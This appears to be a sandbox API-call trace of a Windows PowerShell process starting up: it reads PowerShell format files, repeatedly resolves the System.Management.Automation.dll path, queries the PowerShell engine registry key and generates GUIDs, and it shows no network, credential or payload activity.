	[0474.718] ReadFile (in: hFile=0x338, lpBuffer=0x365033f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x365033f*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0474.718] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0474.719] CloseHandle (hObject=0x338) returned 1
	[0474.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0474.719] SetErrorMode (uMode=0x1) returned 0x1
	[0474.719] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d020 | out: lpFileInformation=0x16d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0474.719] SetErrorMode (uMode=0x1) returned 0x1
	[0474.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0474.719] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d108 | out: phkResult=0x16d108*=0x338) returned 0x0
	[0474.719] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d08c, lpData=0x0, lpcbData=0x16d088*=0x0 | out: lpType=0x16d08c*=0x1, lpData=0x0, lpcbData=0x16d088*=0x56) returned 0x0
	[0474.720] CoTaskMemAlloc (cb=0x5a) returned 0x272150
	[0474.720] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d05c, lpData=0x272150, lpcbData=0x16d058*=0x56 | out: lpType=0x16d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d058*=0x56) returned 0x0
	[0474.720] CoTaskMemFree (pv=0x272150) 
	[0474.720] RegCloseKey (hKey=0x338) returned 0x0
	[0474.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0474.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0475.943] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x4b741bea, Data2=0xd59a, Data3=0x4d26, Data4=([0]=0x8f, [1]=0x1c, [2]=0x58, [3]=0xf0, [4]=0xa9, [5]=0x57, [6]=0x21, [7]=0x77))) returned 0x0
	[0475.944] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x680862d7, Data2=0x7904, Data3=0x4e55, Data4=([0]=0x90, [1]=0xca, [2]=0xe2, [3]=0x3b, [4]=0x4b, [5]=0x1, [6]=0x9, [7]=0x23))) returned 0x0
	[0475.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0475.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0475.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0475.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.734] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xa873c57c, Data2=0x2d2c, Data3=0x4b29, Data4=([0]=0x99, [1]=0xea, [2]=0x45, [3]=0xbe, [4]=0xcc, [5]=0x48, [6]=0xbb, [7]=0x89))) returned 0x0
	[0476.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.738] VirtualQuery (in: lpAddress=0x16b340, lpBuffer=0x16c200, dwLength=0x30 | out: lpBuffer=0x16c200*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0476.739] VirtualQuery (in: lpAddress=0x16b3d0, lpBuffer=0x16c290, dwLength=0x30 | out: lpBuffer=0x16c290*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0476.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.741] VirtualQuery (in: lpAddress=0x16bb50, lpBuffer=0x16ca10, dwLength=0x30 | out: lpBuffer=0x16ca10*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0476.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.743] VirtualQuery (in: lpAddress=0x16bb50, lpBuffer=0x16ca10, dwLength=0x30 | out: lpBuffer=0x16ca10*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0476.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.319] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xbbc55083, Data2=0xc63c, Data3=0x4ec6, Data4=([0]=0xb3, [1]=0x9, [2]=0xee, [3]=0xb, [4]=0x9f, [5]=0x3f, [6]=0x89, [7]=0x26))) returned 0x0
	[0477.320] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x514b839c, Data2=0x81e1, Data3=0x4105, Data4=([0]=0xae, [1]=0x65, [2]=0x70, [3]=0xe3, [4]=0x69, [5]=0x74, [6]=0xe8, [7]=0x40))) returned 0x0
	[0477.320] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x4e206f24, Data2=0x14f9, Data3=0x4e64, Data4=([0]=0xa3, [1]=0xa7, [2]=0x17, [3]=0x12, [4]=0xb8, [5]=0x3d, [6]=0x1c, [7]=0xfb))) returned 0x0
	[0477.332] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x46722ee5, Data2=0x12c2, Data3=0x421b, Data4=([0]=0x99, [1]=0x5d, [2]=0xf7, [3]=0x8f, [4]=0xe, [5]=0xf0, [6]=0xd2, [7]=0x1b))) returned 0x0
	[0477.333] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x3d03e183, Data2=0x1b04, Data3=0x4d5b, Data4=([0]=0x8d, [1]=0xbd, [2]=0x86, [3]=0x4d, [4]=0x2a, [5]=0xe6, [6]=0x48, [7]=0x40))) returned 0x0
	[0477.333] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x732469b, Data2=0xf5fb, Data3=0x467e, Data4=([0]=0x86, [1]=0x6b, [2]=0xa3, [3]=0x3e, [4]=0x8c, [5]=0x79, [6]=0xb3, [7]=0xe8))) returned 0x0
	[0477.334] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xbcfe4eb9, Data2=0x9790, Data3=0x4b31, Data4=([0]=0xa2, [1]=0x58, [2]=0x6c, [3]=0x6d, [4]=0x84, [5]=0x3c, [6]=0x79, [7]=0xd))) returned 0x0
	[0477.334] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xa8c10d20, Data2=0xabc1, Data3=0x47da, Data4=([0]=0xa4, [1]=0x53, [2]=0xb4, [3]=0x16, [4]=0xd1, [5]=0xc0, [6]=0x50, [7]=0x48))) returned 0x0
	[0477.334] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xe4242711, Data2=0x4e13, Data3=0x4b8f, Data4=([0]=0xa0, [1]=0x53, [2]=0xc8, [3]=0x18, [4]=0x96, [5]=0x3e, [6]=0x8d, [7]=0x3c))) returned 0x0
	[0477.334] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x1caab4cc, Data2=0x5966, Data3=0x4191, Data4=([0]=0xbb, [1]=0xc, [2]=0x33, [3]=0x72, [4]=0xf, [5]=0xee, [6]=0x6, [7]=0x8a))) returned 0x0
	[0477.334] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x395faf52, Data2=0x6a7a, Data3=0x4a5d, Data4=([0]=0x82, [1]=0x5d, [2]=0x15, [3]=0x6e, [4]=0x33, [5]=0x7e, [6]=0x18, [7]=0xfa))) returned 0x0
	[0477.334] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xb410bd29, Data2=0x6d13, Data3=0x43fe, Data4=([0]=0xb1, [1]=0xd8, [2]=0x64, [3]=0x53, [4]=0x18, [5]=0x60, [6]=0xcf, [7]=0x50))) returned 0x0
	[0477.335] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x9cb66f, Data2=0x91b2, Data3=0x4024, Data4=([0]=0x9f, [1]=0xa9, [2]=0x9b, [3]=0x11, [4]=0x23, [5]=0x1, [6]=0x28, [7]=0xa5))) returned 0x0
	[0477.336] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x762d3350, Data2=0x927d, Data3=0x44f0, Data4=([0]=0xbf, [1]=0x92, [2]=0x79, [3]=0x36, [4]=0xd4, [5]=0x2f, [6]=0xd7, [7]=0xba))) returned 0x0
	[0477.337] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xb122ed06, Data2=0x6d3b, Data3=0x4380, Data4=([0]=0xbf, [1]=0xa0, [2]=0x5a, [3]=0x0, [4]=0x70, [5]=0xe2, [6]=0xae, [7]=0x99))) returned 0x0
	[0477.337] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x14a286a9, Data2=0x48ea, Data3=0x4d0d, Data4=([0]=0xb6, [1]=0x6, [2]=0xd7, [3]=0x5d, [4]=0x34, [5]=0x89, [6]=0x2b, [7]=0x49))) returned 0x0
	[0477.337] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x6b777f80, Data2=0x2b40, Data3=0x41e7, Data4=([0]=0xa7, [1]=0xf2, [2]=0xd7, [3]=0xc, [4]=0xb7, [5]=0x45, [6]=0x20, [7]=0x43))) returned 0x0
	[0477.337] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x713bb49e, Data2=0xd8fe, Data3=0x4d03, Data4=([0]=0x8f, [1]=0x62, [2]=0x67, [3]=0xf6, [4]=0x18, [5]=0xda, [6]=0xb, [7]=0xfc))) returned 0x0
	[0477.337] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x6d1f9c29, Data2=0xcf54, Data3=0x430f, Data4=([0]=0xb5, [1]=0x9d, [2]=0xaa, [3]=0xf6, [4]=0x27, [5]=0x59, [6]=0x9a, [7]=0x35))) returned 0x0
	[0477.338] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xa731edf7, Data2=0xf126, Data3=0x4dee, Data4=([0]=0x97, [1]=0x72, [2]=0xb0, [3]=0x92, [4]=0x11, [5]=0x73, [6]=0x35, [7]=0xb2))) returned 0x0
	[0477.338] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xd5fa8592, Data2=0x42b3, Data3=0x4bfa, Data4=([0]=0x9d, [1]=0x37, [2]=0x91, [3]=0x58, [4]=0x5c, [5]=0xbd, [6]=0x25, [7]=0xb1))) returned 0x0
	[0477.338] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x34371f8d, Data2=0x6774, Data3=0x466c, Data4=([0]=0xa3, [1]=0xe1, [2]=0xc, [3]=0xba, [4]=0x1d, [5]=0x48, [6]=0xdd, [7]=0x6e))) returned 0x0
	[0477.338] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0477.338] GetFileType (hFile=0x338) returned 0x1
	[0477.338] SetErrorMode (uMode=0x1) returned 0x1
	[0477.338] GetFileType (hFile=0x338) returned 0x1
